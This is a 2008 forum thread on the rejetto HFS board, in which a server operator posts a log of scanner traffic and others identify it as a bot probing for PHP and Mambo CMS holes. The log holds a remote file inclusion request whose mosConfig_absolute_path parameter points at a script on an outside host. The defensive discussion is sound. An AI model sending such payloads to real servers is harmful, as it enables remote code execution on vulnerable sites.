rejetto forum

Did anyone know anything about "Morfeus Fucking Scanner"

Pit · 8 · 20128

0 Members and 1 Guest are viewing this topic.

Offline Pit

  • Tireless poster
  • ****
    • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
Much time of today my webserver was scannt from "Morfeus Fucking Scanner"
This is a part of the log:

17.11.2008 16:54:10 194.165.49.36:50035 Connected
17.11.2008 16:54:10 194.165.49.36:50035 Disconnected
17.11.2008 16:56:10 194.165.49.36:46236 Connected
17.11.2008 16:56:10 194.165.49.36:46236 Requested GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/
17.11.2008 16:56:10 194.165.49.36:46236 Request dump
> GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/ HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Morfeus Fucking Scanner
> Host: 91.37.233.251
> Connection: Close
17.11.2008 16:56:10 194.165.49.36:46236 Served 3,61 KB
17.11.2008 16:56:10 194.165.49.36:46236 Disconnected by server - 3693 bytes sent
17.11.2008 16:56:10 194.165.49.36:46363 Connected
17.11.2008 16:56:10 194.165.49.36:46363 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:10 194.165.49.36:46439 Connected
17.11.2008 16:56:10 194.165.49.36:46439 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:11 194.165.49.36:46512 Connected
17.11.2008 16:56:11 194.165.49.36:46512 Disconnected by server - 1823 bytes sent
17.11.2008 16:56:11 194.165.49.36:46590 Connected
17.11.2008 16:56:11 194.165.49.36:46590 Disconnected by server - 1823 bytes sent


Did anyone know anything about "Morfeus Fucking Scanner" and is it a risk for HFS?
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org


Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13523
    • View Profile
never heard, and it's not a risk IMO.
with event scripts you can even ban it, just to get a cleaner log.
but if it comes from a single IP you can just ban the ip, easier.


Offline Pit

  • Tireless poster
  • ****
    • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
That was the first thing wat i have done. I think it is DDos-Attack.
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org


Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13523
    • View Profile

Offline SilentPliz

  • Operator
  • Tireless poster
  • *****
    • Posts: 1298
  • ....... chut ! shh!
    • View Profile
Morfeus is a scanner that looks for vulnerabilities in PHP based web sites (bot).

I don't think it could be a danger to HFS.

« Last Edit: November 17, 2008, 06:12:12 PM by SilentPliz »


Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13523
    • View Profile
a quick search on google will reveal that mosConfig_absolute_path is an attack to mambo (cms) installations


Offline Pit

  • Tireless poster
  • ****
    • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
Thanks for your replys and have a nice evening.
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org


Offline SilentPliz

  • Operator
  • Tireless poster
  • *****
    • Posts: 1298
  • ....... chut ! shh!
    • View Profile